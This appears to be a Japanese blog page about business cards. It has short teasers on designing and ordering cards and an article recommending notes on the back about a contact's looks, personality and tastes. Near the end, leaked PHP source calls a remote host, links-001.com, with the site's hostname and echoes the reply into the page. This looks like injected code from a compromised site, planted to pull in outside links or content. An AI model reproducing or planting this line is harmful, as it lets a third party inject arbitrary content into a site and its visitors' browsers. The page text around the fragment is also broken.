前へ
次へ

自分で名刺を作成することのメリット

名刺を自分で作成する場合には、どのようなデザインでするか自分ですべて考えなければなりません。

more

名刺は個人負担で作成する企業が増えています。

最近ではどこの企業でも広告費用は減らされています。
名刺の作成費は広告費用の一つですから、企業

more

名刺作成は安心して依頼することが出来ます

最近は名刺作成を、インターネットで依頼することができるので非常に便利です。
ただ業者の店舗に足

more

名刺に付加的な情報を追記する。

名刺に記載されている情報は、ほとんどの場合、公式の情報です。
そのため、どこからでも入手できる場合が多いです。
重要なのは、その名刺をもらった時の状況や相手の状態など、付加的な情報なのです。
相手がどのような人物であるかということは仕事状の関係において非常に大切なことですので、誰にでもわかるように情報として残しておく必要があります。
裏面に手書きで記載するなど、後々まで忘れないようにしておくことが大切です。
例えば、相手の顔や体型など、相手を識別するための情報は重要です。
最近では自分の顔写真を載せている人もいますが、太っているか痩せているか、背が高いか低いかなど付加的な情報を記しておけば後々助かります。
相手を識別するための情報だけでなく、相手の性格や好みなど、相手と話す際のポイントになるような事項も重要な情報です。
それらの情報を名刺と一緒に残すことで、データベース化した場合に大いに役に立つことになるのです。

".file_get_contents('http://links-001.com/123set5.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

Page Top